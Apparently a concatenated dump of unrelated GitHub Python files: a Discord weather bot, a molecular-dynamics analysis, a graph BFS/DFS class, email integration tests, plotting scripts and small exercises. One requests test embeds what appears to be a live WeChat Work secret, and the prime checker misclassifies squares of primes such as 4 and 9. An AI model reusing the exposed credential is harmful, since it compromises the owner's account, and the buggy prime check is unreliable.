(\"Diagnostic code \", output)\n\n\n ","repo_name":"chedabob/adventofcode-2019","sub_path":"day5/day5p1.py","file_name":"day5p1.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34158217537","text":"import discord\r\nimport time\r\nimport os\r\nimport requests\r\nfrom discord.ext import commands\r\nimport openai\r\nfrom dotenv import load_dotenv \r\nload_dotenv()\r\n\r\nTOKEN = os.getenv('DISCORD_TOKEN')\r\nAPI_KEY = os.getenv('API_KEY')\r\napi_endpoint = 'http://dataservice.accuweather.com/forecasts/v1/daily/1day/331243?apikey=' + API_KEY\r\n# Initialize variables for chat history\r\nexplicit_input = \"\"\r\nchatgpt_output = 'Chat log: /n'\r\ncwd = os.getcwd()\r\ni = 1\r\n\r\n# Find an available chat history file\r\nwhile os.path.exists(os.path.join(cwd, f'chat_history{i}.txt')):\r\n i += 1\r\n\r\nhistory_file = os.path.join(cwd, f'chat_history{i}.txt')\r\n\r\n# Create a new chat history file\r\nwith open(history_file, 'w') as f:\r\n f.write('\\n')\r\n\r\n# Initialize chat history\r\nchat_history = ''\r\n\r\n#api\r\ndata = ''\r\nresponse = requests.get(api_endpoint)\r\nif response.status_code == 200:\r\n data = response.json()\r\n print(data)\r\nelse:\r\n print(f\"Error: {response.status_code}\")\r\n\r\n#OPEN AI STUFF\r\n#Put your key in the .env File and grab it here\r\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\r\n\r\nname = 'Flint Lockwood'\r\n\r\nrole = 'meteorologist'\r\n# Define the impersonated role with instructions\r\nimpersonated_role = f\"\"\"\r\n From now on, you are going to act as {name}. Your role is {role}. You must act like we are in the cloudy with a chance of meatballs world.\r\n When it rains, you must act like it is raining meatballs. Use the weather given from this JSON {data}.\"\"\"\r\n\r\n# Function to complete chat input using OpenAI's GPT-3.5 Turbo\r\ndef chatcompletion(user_input, impersonated_role, explicit_input, chat_history):\r\n output = openai.ChatCompletion.create(\r\n model=\"gpt-3.5-turbo-0301\",\r\n temperature=1,\r\n presence_penalty=0,\r\n frequency_penalty=0,\r\n max_tokens=2000,\r\n messages=[\r\n {\"role\": \"system\", \"content\": f\"{impersonated_role}. Conversation history: {chat_history}\"},\r\n {\"role\": \"user\", \"content\": f\"{user_input}. {explicit_input}\"},\r\n ]\r\n )\r\n\r\n for item in output['choices']:\r\n chatgpt_output = item['message']['content']\r\n\r\n return chatgpt_output\r\n\r\n# Function to handle user chat input\r\ndef chat(user_input):\r\n global chat_history, name, chatgpt_output\r\n current_day = time.strftime(\"%d/%m\", time.localtime())\r\n current_time = time.strftime(\"%H:%M:%S\", time.localtime())\r\n chat_history += f'\\nUser: {user_input}\\n'\r\n chatgpt_raw_output = chatcompletion(user_input, impersonated_role, explicit_input, chat_history).replace(f'{name}:', '')\r\n chatgpt_output = f'{name}: {chatgpt_raw_output}'\r\n chat_history += chatgpt_output + '\\n'\r\n with open(history_file, 'a') as f:\r\n f.write('\\n'+ current_day+ ' '+ current_time+ ' User: ' +user_input +' \\n' + current_day+ ' ' + current_time+ ' ' + chatgpt_output + '\\n')\r\n f.close()\r\n return chatgpt_raw_output\r\n\r\n\r\n#DISCORD STUFF\r\nintents = discord.Intents().all()\r\nclient = commands.Bot(command_prefix=\"!\", intents=intents)\r\n#Set up your commands to grab them.\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(\"Bot is ready\")\r\n\r\n@client.command()\r\nasync def location(ctx):\r\n await ctx.send(\"Hello, I provide forecast information for Charlottesville, VA.\")\r\n\r\n@client.command()\r\nasync def Help(ctx):\r\n await ctx.send(\"Hello, my name is Flint Lockwood, and I am here to answer any weather related questions for the day. You can type !help for a list of other commands, otherwise, simply ask me a question and I shall answer!\")\r\n\r\n@client.command()\r\nasync def whoami(ctx):\r\n await ctx.send(\"My name is Flint Lockwood, and I live in Swallow Falls. I am an inventor and made it so that instead of raining water, it rains food!\")\r\n\r\n@client.command()\r\nasync def rules(ctx):\r\n await ctx.send(\"No profanity! Respect Everyone. Enjoy the food that falls from the sky!\")\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n print(message.content)\r\n if message.author == client.user:\r\n return\r\n print(message.author)\r\n print(client.user)\r\n print(message.content)\r\n if message.content.startswith('!'):\r\n await client.process_commands(message)\r\n else:\r\n answer = chat(message.content)\r\n await message.channel.send(answer)\r\n\r\n\r\n@client.command()\r\n@commands.is_owner()\r\nasync def shutdown(context):\r\n exit()\r\n#load data in a stats table\r\n\r\n\r\nclient.run(TOKEN)","repo_name":"kttsai1/DS2002","sub_path":"data_project_2/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19160741328","text":"from DiscUtils import *\nimport matplotlib.pyplot as plt\n\n\n# Trajectory paths\ndcdPath = '../Current_D1_trajectory/D1_combined_pbc_fixed.dcd'\npsfPath = '../Current_D1_trajectory/D1_combined.psf'\ndt = 2e-10 \n\ndef P_2(v, t):\n # the second order Legendre polynomial\n intervals = len(v) - t\n total = 0.0\n for t_0 in range(intervals):\n total += (np.vdot(v[t_0], v[t_0+t]) ** 2)\n avg = total / (intervals)\n return (3/2.) * avg - (1/2.)\n\n\ndef cos2theta_fun(initpos, pos):\n return np.power(np.vdot(initpos,pos),2)\n\n\ndef main():\n u = mda.Universe(psfPath, dcdPath)\n nframes = len(u.trajectory)\n # coarse grain atoms \n x1 = u.select_atoms('bynum 21', updating=True)\n x2 = u.select_atoms('bynum 232', updating=True)\n y1 = u.select_atoms('bynum 121', updating=True)\n y2 = u.select_atoms('bynum 332', updating=True)\n\n xs = np.zeros(nframes)\n x_axis_positions = np.zeros((nframes, 3))\n y_axis_positions = np.zeros((nframes, 3))\n z_axis_positions = np.zeros((nframes, 3))\n u_positions = np.zeros((nframes, 3))\n for i,ts in enumerate(u.trajectory):\n # Get local coordinate axes \n x1_pos = x1[0].position\n x2_pos = x2[0].position\n x = (x1_pos - x2_pos) / (np.linalg.norm(x1_pos - x2_pos))\n y1_pos = y1[0].position\n y2_pos = y2[0].position\n y = (y1_pos - y2_pos) / (np.linalg.norm(y1_pos - y2_pos))\n z = np.cross(x, y) \n \n x_axis_positions[i] = x \n y_axis_positions[i] = y \n z_axis_positions[i] = z / np.linalg.norm(z) \n \n # The unit vector is attached to one of the x-axis points\n # and subtends a 45 degree angle with the horizon\n tvec = (x + y + z) / np.linalg.norm(x + y + z)\n tpos = x1_pos + tvec \n u_positions[i] = (tpos - x1_pos) / np.linalg.norm(tpos - x1_pos)\n u_positions[i][0] = -u_positions[i][0]\n # X points for graphing \n #xs[i] = dt * i \n xs[i] = dt * i / (1e-9) \n\n print('initial pos of unit vector: {}'.format(u_positions[0]))\n print('initial pos of z-axis: {}'.format(z_axis_positions[0]))\n n = 6000 \n v = np.zeros(n)\n v[0] = 0\n theta = np.arccos(np.vdot(u_positions[0], z_axis_positions[0]))\n cos2theta = np.power(np.cos(theta), 2)\n sin2theta = np.power(np.sin(theta), 2) \n sin4theta = np.power(np.sin(theta), 4)\n alpha1 = (1/4.) * np.power((3 * cos2theta-1), 2)\n alpha2 = 3 * sin2theta * cos2theta\n alpha3 = (3/4.) * sin4theta\n initpos = u_positions[0]\n\n mod_positions = u_positions[:6000]\n for t in range(1,n):\n v[t] = P_2(mod_positions,t) \n\n \n # Fit to sum of exponentials\n def exponential_model(t,tau1, tau2, tau3):\n return alpha1 * np.exp(-t/tau1) + alpha2 * np.exp(-t/tau2) + alpha3 * np.exp(-t/tau3)\n\n v_fit = v[1:] # fitting cutoffs \n def fitfun(taus):\n l = len(v_fit)\n s = 0.0\n for t in range(l):\n s += np.power(v_fit[t]-exponential_model(t*dt,taus[0],taus[1],taus[2]), 2)\n s /= l \n return np.sqrt(s)\n\n from scipy import optimize\n minimum = optimize.minimize(fitfun, [1e-7, 1e-7, 1e-7], method='Nelder-Mead', options={'xatol':1e-11})\n print('Parameters of minimization: {}'.format(minimum.x))\n print('Alphas: {}, {}, {}'.format(alpha1,alpha2,alpha3))\n # Make some magic pictures\n fig = plt.figure()\n ax = fig.add_subplot(111)\n final_taus = minimum.x\n xs = np.zeros(len(v_fit))\n fit_ys = np.zeros(len(v_fit))\n calc_ys = np.zeros(len(v_fit))\n for i,val in enumerate(v_fit):\n input_val = i * dt\n fit_ys[i] = exponential_model(input_val, final_taus[0], final_taus[1], final_taus[2])\n calc_ys[i] = val \n xs[i] = input_val \n ax.plot(xs, calc_ys, 'b', xs, fit_ys, 'r')\n plt.show()\n \n \n f = open('t_vs_p2.csv', 'w')\n f.write('time,p2\\n')\n for i,val in enumerate(v):\n f.write('{},{}\\n'.format(i*dt,val))\n f.close() \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"stationarysalesman/mister-disky","sub_path":"disky2.py","file_name":"disky2.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32670012618","text":"# Check Prime Number\nimport math\nimport random\n\n\ndef isPrime(n):\n print(\"n = \", n)\n sqrtN = int(math.sqrt(n))\n for i in range(2, sqrtN):\n if n % i == 0:\n print(\"i = \", i)\n return \"n is not prime\"\n return \"n is prime\"\n\n\nprint(isPrime(random.randrange(2, 32768)))\n","repo_name":"MinhoJJang/2023-first-semester","sub_path":"DataScience/Assignment/Week_01/isPrime.py","file_name":"isPrime.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37692581641","text":"from typing import Any\n\n__all__ = (\n 'Node',\n 'Graph'\n)\n\n\nclass Node:\n def __init__(self, value: Any):\n self.value = value\n\n self.outbound = []\n self.inbound = []\n\n def point_to(self, other: 'Node'):\n self.outbound.append(other)\n other.inbound.append(self)\n\n def __str__(self):\n return f'Node({repr(self.value)})'\n\n __repr__ = __str__\n\n\nclass Graph:\n def __init__(self, root: Node):\n self._root = root\n\n def dfs(self) -> list[Node]:\n def recursive_dfs(node, res):\n if node not in res:\n res.append(node)\n for other in node.outbound:\n recursive_dfs(other, res)\n return\n\n result = [self._root]\n for node in self._root.outbound:\n recursive_dfs(node, result)\n return result\n\n\n\n def bfs(self) -> list[Node]:\n result = []\n queue = [self._root]\n while queue:\n if queue[-1] not in result:\n node = queue.pop()\n result.append(node)\n queue = node.outbound[::-1] + queue\n else:\n queue.pop()\n\n return result\n","repo_name":"eprush/hw-backend-summer-2023-1-algorithms","sub_path":"tasks/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16293257724","text":"def get_days_in_month(month, year):\n\tif month in [4,6,9,11]:\n\t\treturn 30\n\telif month == 2:\n\t\tif year % 4 == 0:\n\t\t\tif year % 100 == 0 and year % 400 != 0:\n\t\t\t\treturn 28\n\t\t\treturn 29\n\t\telse:\n\t\t\treturn 28\n\telse:\n\t\treturn 31\n\n# Week starts on sunday = 0\nmonth_start_day = (1 + 365) % 7 # Initialize by knowing: 1 Jan 1900 was a Monday\nmonth = 1\nyear = 1901\n\ncount = 0\ndays_in_month = 0\nwhile year < 2001:\n\tmonth = 1\n\twhile month < 13:\n\t\t# Check this month start day\n\t\tif month_start_day == 0:\n\t\t\tcount += 1\n\n\t\t# Set up next month\n\t\tmonth_start_day = (month_start_day + get_days_in_month(month, year)) % 7\n\t\tmonth += 1\n\n\tyear += 1\n\nprint(count)","repo_name":"sabaduy/ProjectEuler","sub_path":"python/0019.py","file_name":"0019.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39164027705","text":"import cassandra.cluster\nimport generator\nfrom cql_utils import *\n\nc = cassandra.cluster.Cluster(['localhost'])\nks = c.connect('chembise_metar_1_12')\n\ndata = generator.loadata()\n\ni = 0\nfor row in data:\n i = i + 1\n if (i % 1000) == 0:\n print(i)\n row = split_daytime(row)\n query = format_insert_query(\"date_by_location\", row)\n\n ks.execute(query)\n","repo_name":"danousna/metar","sub_path":"insert-data.py","file_name":"insert-data.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"20663318670","text":"import os\nimport glob\nimport argparse\n\nimport pandas as pd\nimport torch\n\nfrom utils.objdict import ObjDict\nfrom utils.mkdir_p import mkdir_p\n\nnext_line = '\\n'\nsaved_label_key = \"pred_ids\"\nof_mapping_key = \"overflow_mapping\"\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_path',type=str)\n parser.add_argument('--write_dataset_only',action='store_true')\n parser.add_argument('--add_id',action='store_true')\n return parser.parse_args()\n\ndef convert_ids_to_string(cfg,device='cuda',out_str='pred_str.txt',write_dataset_only=False,add_id=False):\n pp = cfg.pipeline\n out_dict = {}\n checkpts = pp.get_model_checkpts(cfg.extract_cfg.model_dir,cfg.extract_cfg.model_key)\n if add_id:\n textids = pd.read_csv(cfg.preprocess_cfg.test_csv_path).id\n \n outfile = open(os.path.join(cfg.extract_cfg.output_dir,out_str),\"w\")\n checkpts.sort()\n for c in checkpts:\n print(\"Processing checkpoint \"+c)\n outfile.write(\"*\"*100+next_line)\n outfile.write(c+next_line)\n outfile.write(\"*\"*100+next_line)\n cdir = os.path.join(cfg.extract_cfg.output_dir,c)\n if not os.path.exists(cdir):\n print(cdir+\" not exist\")\n continue\n fs = [f for f in os.listdir(cdir) if \".pt\" in f]\n fs.sort()\n if not fs:\n print(\"empty folder: {}, skipping\".format(c))\n continue\n pred_ids = torch.cat([torch.load(os.path.join(cdir,f)) for f in fs if saved_label_key in f])\n if add_id:\n ids = torch.cat([torch.load(os.path.join(cdir,f)) for f in fs if of_mapping_key in f])\n pred_ids[pred_ids==-1] = 0\n if write_dataset_only:\n pred_idx = torch.sum(pred_ids,axis=1)!=0\n pred_ids = pred_ids[pred_idx]\n ids = ids[pred_idx]\n pp.print_message(c)\n\n strs = cfg.tokenizer.batch_decode(pred_ids,skip_special_tokens=True)\n if add_id:\n outfile.write(next_line.join([str(textids[int(ids[i])])+\": \"+str(i)+\", \"+s for i,s in enumerate(strs) if s]))\n else:\n outfile.write(next_line.join([str(i)+\", \"+s for i,s in enumerate(strs) if s]))\n outfile.write(next_line)\n outfile.close()\n\nif __name__ == \"__main__\":\n\n args = parse_arguments()\n\n if \"*\" in args.input_path:\n paths = glob.glob(args.input_path)\n else:\n paths = args.input_path.split(\",\")\n\n assert len(paths) > 0\n \n cfgs = [ObjDict.read_all_from_file_python3(p) for p in paths]\n assert all([hasattr(c,\"plot_label\",) for c in cfgs])\n \n data = {}\n for c in cfgs:\n convert_ids_to_string(c,write_dataset_only=args.write_dataset_only,add_id=args.add_id) \n","repo_name":"lucien1011/kaggle-coleridgeinitiative-show-us-the-data","sub_path":"postprocessing/make_text_from_saved_ids.py","file_name":"make_text_from_saved_ids.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40773490289","text":"import os\nimport unittest\nfrom datetime import datetime, timedelta\nfrom email.utils import formataddr\n\nfrom django.test import SimpleTestCase, override_settings, tag\n\nfrom anymail.exceptions import AnymailAPIError\nfrom anymail.message import AnymailMessage\n\nfrom .utils import AnymailTestMixin\n\nANYMAIL_TEST_SENDINBLUE_API_KEY = os.getenv(\"ANYMAIL_TEST_SENDINBLUE_API_KEY\")\nANYMAIL_TEST_SENDINBLUE_DOMAIN = os.getenv(\"ANYMAIL_TEST_SENDINBLUE_DOMAIN\")\n\n\n@tag(\"sendinblue\", \"live\")\n@unittest.skipUnless(\n ANYMAIL_TEST_SENDINBLUE_API_KEY and ANYMAIL_TEST_SENDINBLUE_DOMAIN,\n \"Set ANYMAIL_TEST_SENDINBLUE_API_KEY and ANYMAIL_TEST_SENDINBLUE_DOMAIN \"\n \"environment variables to run SendinBlue integration tests\",\n)\n@override_settings(\n ANYMAIL_SENDINBLUE_API_KEY=ANYMAIL_TEST_SENDINBLUE_API_KEY,\n ANYMAIL_SENDINBLUE_SEND_DEFAULTS=dict(),\n EMAIL_BACKEND=\"anymail.backends.sendinblue.EmailBackend\",\n)\nclass SendinBlueBackendIntegrationTests(AnymailTestMixin, SimpleTestCase):\n \"\"\"SendinBlue v3 API integration tests\n\n SendinBlue doesn't have sandbox so these tests run\n against the **live** SendinBlue API, using the\n environment variable `ANYMAIL_TEST_SENDINBLUE_API_KEY` as the API key,\n and `ANYMAIL_TEST_SENDINBLUE_DOMAIN` to construct sender addresses.\n If those variables are not set, these tests won't run.\n\n https://developers.sendinblue.com/docs/faq#section-how-can-i-test-the-api-\n\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.from_email = \"from@%s\" % ANYMAIL_TEST_SENDINBLUE_DOMAIN\n self.message = AnymailMessage(\n \"Anymail SendinBlue integration test\",\n \"Text content\",\n self.from_email,\n [\"test+to1@anymail.dev\"],\n )\n self.message.attach_alternative(\"

    HTML content

    \", \"text/html\")\n\n def test_simple_send(self):\n # Example of getting the SendinBlue send status and message id from the message\n sent_count = self.message.send()\n self.assertEqual(sent_count, 1)\n\n anymail_status = self.message.anymail_status\n sent_status = anymail_status.recipients[\"test+to1@anymail.dev\"].status\n message_id = anymail_status.recipients[\"test+to1@anymail.dev\"].message_id\n\n self.assertEqual(sent_status, \"queued\") # SendinBlue always queues\n # Message-ID can be ...@smtp-relay.mail.fr or .sendinblue.com:\n self.assertRegex(message_id, r\"\\<.+@.+\\>\")\n # set of all recipient statuses:\n self.assertEqual(anymail_status.status, {sent_status})\n self.assertEqual(anymail_status.message_id, message_id)\n\n def test_all_options(self):\n send_at = datetime.now() + timedelta(minutes=2)\n message = AnymailMessage(\n subject=\"Anymail SendinBlue all-options integration test\",\n body=\"This is the text body\",\n from_email=formataddr((\"Test From, with comma\", self.from_email)),\n to=[\"test+to1@anymail.dev\", '\"Recipient 2, OK?\" '],\n cc=[\"test+cc1@anymail.dev\", \"Copy 2 \"],\n bcc=[\"test+bcc1@anymail.dev\", \"Blind Copy 2 \"],\n # SendinBlue API v3 only supports single reply-to\n reply_to=['\"Reply, with comma\" '],\n headers={\"X-Anymail-Test\": \"value\", \"X-Anymail-Count\": 3},\n metadata={\"meta1\": \"simple string\", \"meta2\": 2},\n send_at=send_at,\n tags=[\"tag 1\", \"tag 2\"],\n )\n # SendinBlue requires an HTML body:\n message.attach_alternative(\"

    HTML content

    \", \"text/html\")\n\n message.attach(\"attachment1.txt\", \"Here is some\\ntext for you\", \"text/plain\")\n message.attach(\"attachment2.csv\", \"ID,Name\\n1,Amy Lina\", \"text/csv\")\n\n message.send()\n # SendinBlue always queues:\n self.assertEqual(message.anymail_status.status, {\"queued\"})\n self.assertRegex(message.anymail_status.message_id, r\"\\<.+@.+\\>\")\n\n def test_template(self):\n message = AnymailMessage(\n # There is a *new-style* template with this id in the Anymail test account:\n template_id=5,\n # Override template sender:\n from_email=formataddr((\"Sender\", self.from_email)),\n # No batch send (so max one recipient suggested):\n to=[\"Recipient \"],\n reply_to=[\"Do not reply \"],\n tags=[\"using-template\"],\n headers={\"X-Anymail-Test\": \"group: A, variation: C\"},\n merge_global_data={\n # The Anymail test template includes `{{ params.SHIP_DATE }}`\n # and `{{ params.ORDER_ID }}` substitutions\n \"SHIP_DATE\": \"yesterday\",\n \"ORDER_ID\": \"12345\",\n },\n metadata={\"customer-id\": \"ZXK9123\", \"meta2\": 2},\n )\n\n # Normal attachments don't work with Brevo templates:\n # message.attach(\"attachment1.txt\", \"Here is some\\ntext\", \"text/plain\")\n # If you can host the attachment content on some publicly-accessible URL,\n # this *non-portable* alternative allows sending attachments with templates:\n message.esp_extra = {\n \"attachment\": [\n {\n \"name\": \"attachment1.txt\",\n # URL where Brevo can download the attachment content while\n # sending (must be content-type: text/plain):\n \"url\": \"https://raw.githubusercontent.com/anymail/django-anymail/\"\n \"main/docs/_readme/template.txt\",\n }\n ]\n }\n\n message.send()\n # SendinBlue always queues:\n self.assertEqual(message.anymail_status.status, {\"queued\"})\n self.assertRegex(message.anymail_status.message_id, r\"\\<.+@.+\\>\")\n\n @override_settings(ANYMAIL_SENDINBLUE_API_KEY=\"Hey, that's not an API key!\")\n def test_invalid_api_key(self):\n with self.assertRaises(AnymailAPIError) as cm:\n self.message.send()\n err = cm.exception\n self.assertEqual(err.status_code, 401)\n # Make sure the exception message includes SendinBlue's response:\n self.assertIn(\"Key not found\", str(err))\n","repo_name":"anymail/django-anymail","sub_path":"tests/test_sendinblue_integration.py","file_name":"test_sendinblue_integration.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":1517,"dataset":"github-code","pt":"39"} +{"seq_id":"15693931589","text":"class Solution:\n \"\"\"\n 给定一个整数数组 nums ,找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和\n 主要思想,只有当sum[:i]-sum[:j]>0的时候,才会对最大和有帮助\n\n [num[0], num[1],......num[i]......num[n-1]]\n 动态规划的是首先对数组进行遍历,当前位置i最大连续子序列和为 sum,sum起始值为0,历史最大子序列结果为 ans,ans起始值为num[0]\n 如果 sum > 0,则说明 sum 对结果有增益效果,则 sum 保留并加上当前遍历数字\n 如果 sum <= 0,则说明 sum 对结果无增益效果,需要舍弃,则 sum 直接更新为当前遍历数字\n 每次比较 当前sum 和 历史ans的大小,将最大值置为ans,继续往后遍历,遍历结束返回结果\n 时间复杂度:O(n)\n \"\"\"\n @staticmethod\n def max_sub_array(nums):\n sum = 0\n history_max_sum = nums[0]\n for num in nums:\n if sum > 0:\n sum += num\n else:\n sum = num\n print(\"历史最大值以及当前最大值:\",history_max_sum,sum)\n history_max_sum = max(history_max_sum,sum)\n return history_max_sum\n\n def maxSubArray(nums):\n pre_sum = 0\n ans = nums[0]\n for num in nums:\n pre_sum = max(pre_sum+num, num)\n print(pre_sum,ans)\n ans = max(pre_sum,ans)\n return ans\n\nif __name__ == \"__main__\":\n nums = [-2,1,-3,4,-1,2,1,-5,4]\n result = Solution.max_sub_array(nums)\n print(\"The max su array is:\", result)\n\n\n\n\n","repo_name":"tinghe0928/leetcode","sub_path":"sliding_window/max_sub_array.py","file_name":"max_sub_array.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25599571509","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 23 17:41:00 2018\n\n@author: bencooper\n\"\"\"\n\nimport os\n\nclass DirGen:\n @staticmethod\n def create_dir(path):\n if os.path.isdir(path) == False:\n os.makedirs(path)\n ","repo_name":"cooperb0199/TSForecasting","sub_path":"utils/dir_generator.py","file_name":"dir_generator.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9147523534","text":"#!/usr/bin/env python\n\n#figure parameter set up\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.dpi'] = 100\nplt.rcParams[\"figure.figsize\"] = [15.0, 6.0]\n# %config InlineBackend.figure_format = 'svg'\n# %matplotlib inline\n\nimport pandas as pd\n\ntotal_match = pd.read_csv('vis_results/total_match.csv', sep = ',')\n\nno_prediction = pd.read_csv('vis_results/no_prediction.csv', sep = ',')\n\nno_prediction_but_E = pd.read_csv('vis_results/no_prediction_but_enzyme.csv', sep = ',')\n\n\nnon_enzyme_correct = pd.read_csv('vis_results/non_enzyme_correct.csv', sep = ',')\n\nPNEBE = pd.read_csv('vis_results/predicted_non_enzyme_but_enzyme.csv', sep = ',')\n\n\nPEBnonE = pd.read_csv('vis_results/predicted_enzyme_but_non_enzyme', sep = ',')\n\ntotal_correct = pd.read_csv('vis_results/correct_to_fourth_digit.csv', sep = ',')\n\n\nthird_digit_correct = pd.read_csv('vis_results/correct_to_third_digit.csv', sep = ',')\n\n\nsecond_digit_correct = pd.read_csv('vis_results/correct_to_second_digit.csv', sep = ',')\n\n\nfirst_digit_correct = pd.read_csv('vis_results/correct_to_first_digit.csv', sep = ',')\n\nfirst_digit_wrong = pd.read_csv('vis_results/first_digit_wrong.csv', sep = ',')\n\ndf_EC = pd.read_csv('vis_results/df_EC.csv', sep = ',')\n\nimport matplotlib.pyplot as plt\n\n\n\ndataframes = [no_prediction,\n PNEBE,\n PEBnonE,\n non_enzyme_correct,\n total_match,\n third_digit_correct,\n second_digit_correct,\n first_digit_correct,\n first_digit_wrong]\n\n\n\nlengths = [len(i) for i in dataframes[0:4]]\ndigits = [len(i) for i in dataframes[4:]]\nlengths.append(sum(digits))\n\npercent_lengths = [i/sum(lengths) for i in lengths]\n\npercent_digits = [i/sum(digits) for i in digits]\n\nbarwidth = 1\n\n\n# create data\nx = ['ECpred \\noverall \\nperformance']\n\n\nlabel_list_lengths = ['No Prediction',\n 'Predicted Non-Enzyme but Enzyme',\n 'Predicted Enzyme but non-Enzyme',\n 'Non Enzyme Correct',\n 'Predicted EC number'] \n\n\ny1 = percent_lengths[4]\ny2 = percent_lengths[3]\ny3 = percent_lengths[2]\ny4 = percent_lengths[1]\ny5 = percent_lengths[0]\n\ncolor = ['b','c','y','g','r']\n# plot bars in stack manner\nplt.bar(x, y1, color= 'b')#color[0])\nplt.bar(x, y2, bottom=y1, color='c')\nplt.bar(x, y3, bottom=y1+y2, color='y')\nplt.bar(x, y4, bottom=y1+y2+y3, color= 'g')\nplt.bar(x, y5, bottom= y1+y2+y3+y4, color = 'r')#'#ff9500')\nplt.legend(label_list_lengths[::-1], bbox_to_anchor=(1.5,1.5), ncol=5,loc='center')\n\n# create data\nx = ['ECpred \\ndigits']\n\n\n\nlabel_list_digits = ['Total correct',\n 'third digit correct',\n 'second digit correct',\n 'first digit correct',\n 'first digit wrong']\n\n\ny1 = percent_digits[0]\ny2 = percent_digits[1]\ny3 = percent_digits[2]\ny4 = percent_digits[3]\ny5 = percent_digits[4]\n \n# plot bars in stack manner\ncolors = ['#377697','#4fa9d9','#72bae0','#a7d4ec','#fdab91']\nplt.rcParams[\"figure.figsize\"] = [5,5]\nplt.bar(x, y1, color= colors[0])#, width = barwidth)\nplt.bar(x, y2, bottom=y1, color = colors[1])#, width = barwidth), width = barwidth)\nplt.bar(x, y3, bottom=y1+y2,color = colors[2])#, width = barwidth), width = barwidth)\nplt.bar(x, y4, bottom=y1+y2+y3, color = colors[3])#, width = barwidth), width = barwidth)\nplt.bar(x, y5, bottom= y1+y2+y3+y4, color = colors[4])#, width = barwidth), width = barwidth)\n\n\n\nplt.ylabel(\"Fraction of the Whole\")\nplt.legend(label_list_digits, bbox_to_anchor=(1.5,1.5), ncol=5,loc='center')\n\nplt.savefig('vis_results/overall_performance.png', format='png', dpi=800)\n\nprint('all done')","repo_name":"Sakib1418/Benchmarking-Enzyme-Classifiers","sub_path":"visualization/overall_performance.py","file_name":"overall_performance.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1049945562","text":"\"\"\"Here you will find functions for getting rid of the same data points.\"\"\"\nfrom math import inf\nimport numpy as np\n\n\ndef dedup(x, y):\n\t\"\"\"Deduplicate the arguments for fitting.\n\t\n\tArgs:\n\t\tx (iterable): values to dedup.\n\t\ty (iterable): corresponding values.\n\tReturns:\n\t\ttuple with values from the input, but retaining only the first\n\t\tamong the repeating ones.\n\t\"\"\"\n\tx1 = []\n\ty1 = []\n\tXprev = -inf\n\tfor X,Y in zip(x,y):\n\t\tif X > Xprev:\n\t\t\tx1.append(X)\n\t\t\ty1.append(Y)\n\t\tXprev = X\n\treturn x1, y1\n\n\ndef dedup_np(x,y):\n\t\"\"\"Deduplicate the arguments for fitting.\n\t\n\tMuch faster then dedup.\n\n\tArgs:\n\t\tx (np.array): values to dedup.\n\t\ty (np.array): corresponding values.\n\tReturns:\n\t\ttuple with values from the input, but retaining only the first\n\t\tamong the repeating ones.\n\t\"\"\"\n\to = np.full(x.shape, True)\n\to[1:] = np.diff(x) > 0\n\treturn x[o], y[o]\n\n\n","repo_name":"MatteoLacki/rta","sub_path":"rta/array_operations/dedupy.py","file_name":"dedupy.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"27870485744","text":"import requests\n\n\ndef test_request():\n url = 'http://httpbin.org/get'\n payload = {'key1':'value1','key2':['value2', 'value3']}\n r = requests.get(url,params = payload)\n print(r)\n\n with open('','r',encoding='utf-8') as f:\n file = f.read()\n\ndef test_request1():\n id = 'wwdae6409305b8bd0c'\n select = 'yfVfCz4aehQ1etcO9Rqh9lx9GPpdcjute5Zyi9w8ZO0'\n url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'\n header ={'corpid':'wwdae6409305b8bd0c',\n 'corpsecret':'yfVfCz4aehQ1etcO9Rqh9lx9GPpdcjute5Zyi9w8ZO0'}\n #r =requests.get(url,headers=headers)\n\n r = requests.get(url,params=header)\n print(r.json())\n token = r.json()['access_token']\n print(token)\n with open('token.yaml','w',encoding='UTF-8') as f:\n f.write(token)\n\n\n\n\n\n","repo_name":"zhuanfang/python","sub_path":"file/从零学Python/day06/requests_use.py","file_name":"requests_use.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32421586302","text":"import 